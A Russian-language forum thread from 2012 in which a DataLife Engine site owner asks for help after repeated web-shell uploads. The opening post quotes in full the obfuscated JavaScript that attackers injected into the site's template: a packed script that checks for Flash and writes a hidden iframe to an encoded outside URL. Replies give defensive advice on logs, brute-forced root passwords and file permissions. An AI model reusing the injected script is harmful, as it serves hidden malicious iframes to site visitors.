Взлом DLE 9.7. Нуждаюсь в ваших размышлениях.

Сашко · 2012-11-15T18:33:29.0000000Z

Доброго времени суток. Имеется сайт на dle 9.7 лицензия. Уже два раза заливают шелл, но в последний раз сам файл от рутовского пользователя. Вставляют код на сайт такого плана: <script type="text/javascript"> var domain = "\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0073\u002d\u0079\u0061\u002e\u0072\u0075\u002f\u0073\u0065\u0061\u0072\u0063\u0068\u002f\u003f\u0054\u0072\u0075\u0065"; var checkFalsh = true; eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('7 h(a){2 b=0;2 c=0;2 d=0;2 e=3.4;v(b<=e.9){c=b;d=c+a.9;5(e.k(c,d)==a){c=d+1;d=3.4.y(";",c);5(d<c)d=3.4.9;6 3.4.k(c,d);G}b++}6""}7 o(a,b,c){2 d=C K;2 e="";d.O(d.A()+c*Q*m*m*I);e=d.E();3.4=a+"="+b+";S="+e}7 q(){5(!M)6 i;2 a=8.g&&8.g["p/x-t-u"]?8.g["p/x-t-u"].w:0;5(a.N!=F)6 i;l 6 B}f=J(f);2 R=3.4;5(h("j")=="r"){}l{5(q()){o("j","r",1);3.z(\'<s H="\'+f+\'" P="U" W="D" T="X" Z="L" Y = "n" V = "n"></s>\')}}',62,62,'||var|document|cookie|if|return|function|navigator|length||||||domain|mimeTypes|findCookie|true|ffsesidd|substring|else|60|1px|addCookie|application|checkFalshEnabled|d04840f88bc33d58fcfd975b86591f91|iframe|shockwave|flash|while|enabledPlugin||indexOf|write|getTime|false|new|auto|toGMTString|undefined|break|src|1e3|unescape|Date|center|checkFalsh|description|setTime|name|24|szCookieString|expires|frameborder|yandex|width|scrolling|no|height|align'.split('|'),0,{})); </script> В первый раз запихнули сие чудо в js, в последний не заморачивались и прям в main.tpl вставили. Подскажите кто знает возможно ли залить файл и присвоить ему другого пользователя? Может весь хостинг взломали? Не слышал что-то дырок в 9.7 версии... (понятно что они будут всегда в DLE) Сейчас естественно поменял все пароли, очистил сайт от шеллов и ограничил доступ к серверу по айпишнику, поможет ли это избавиться от проблемы?

W

114

wolfston

15 ноября 2012, 18:59

#11

Сашко:
Соседние сайты изначально были разнесены по разным аккуантам в целях безопасности и не заражены, пароли в браузерах и в клиентах ftp никогда не сохранаю. Всё бы хорошо и вопросов бы не было по поводу шеллов (это же dle), но смутило что у него рутовский пользователь на сервере.

Могли залить шел под пользователем а потом запусить брут и если пароль рута слабый сбрутить его, поэтому проверяйте логи ftp, ssh, панели и phpmyadmin, пароль рута мог уйти только с них.

NT

109

npocToNIK

15 ноября 2012, 19:22

#12

а как обстоит дела с правами на файлы?)

[Удален]

15 ноября 2012, 19:23

#13

Всё стандартно:

- все htaccess 444

- файлы 644

- папки 755

R

180

Алексей

15 ноября 2012, 19:30

#14

могут быть загрузсчики, внешний ни чего не скажешь тут уже нужно смотреть сам код движка.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov

77

trOid

16 ноября 2012, 01:25

#15

смотри файлы .htaccess по правам, и лишнему коды в них

так же по дате...

было такое, достаточно неделю чистил ежедневно, права все сбились везде, хотя показывало норм. потом видимо чуваку надоело, и он отстал )

взломан сайт Сканер на вирусы от Переадресация с помощью htaccess

119

Digdug

16 ноября 2012, 01:29

#16

У меня было такое...думаю у многих было) взлом был через соседние сайты. На тот момент соседние сайты не были особы нужны, поэтому удалил их и все ок. Причем шелл сам закачивался в разные папки разных доменов :) было довольно интересно играть с ним. Обратитесь к хорошему админу и не ломайте голову. Бэкапы сделайте...

Два вопроса в одном Взлом сайтов! Владельцам DLE <div style="display:none;

Маркетинг для шоколадной фабрики. На 34% выше средний чек

В 2023 году Google заблокировал более 170 млн фальшивых отзывов на Картах